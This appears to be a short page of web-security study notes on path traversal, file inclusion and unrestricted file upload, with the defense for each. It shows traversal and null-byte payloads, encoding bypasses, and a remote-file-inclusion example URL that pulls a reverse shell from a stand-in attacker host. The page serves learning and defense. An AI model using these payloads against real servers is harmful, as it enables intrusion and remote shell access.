Files and Resources Attacks

Path Traversal

A parameter is referencing the a file in the web server, and the parameter fails to validate, allowing the attacker to provide payload like ../ to read arbitrary files in the web server.

For PHP < 5.3.4, we can terminate the URL request by using %00, a NULL byte. For example, if the webapp is doing:

file_read ("/document/" + user_input + ".pdf")

What the attack can do is to use %00 to make the web server ignore the extension .pdf.

Bypass by encoding

  • URL encoding / 16-bit unicode

. = %2e = %u002e / = %2f = %u2215 \ = %5c = %u2216

Defense

  • Filter . / \

File Inclusion

Local File Inclusion

  • Similar to ../

Remote File Inclusion

  • e.g. vuln.php?page=http://attacker.site/reverse-shell.php

Root cause:

  • allow_url_include directive is set to ON within php.ini

Unrestricted File Upload

No check on file uploaded --> Leading to malicious page (e.g. php reverse shell).

Conditions:

  • The file type is not checked

  • The file name and path of the uploaded document is known / guessable

  • The folder in which the file is placed allows the execution of server-side scripts

Defenses

  1. Check Metadata (name, extension, size ...)

    1. Whitelist / Blacklist

  2. Actual content

    1. Determine the file type based on the uploaded content

PreviousSession SecurityNextOther Attacks

Last updated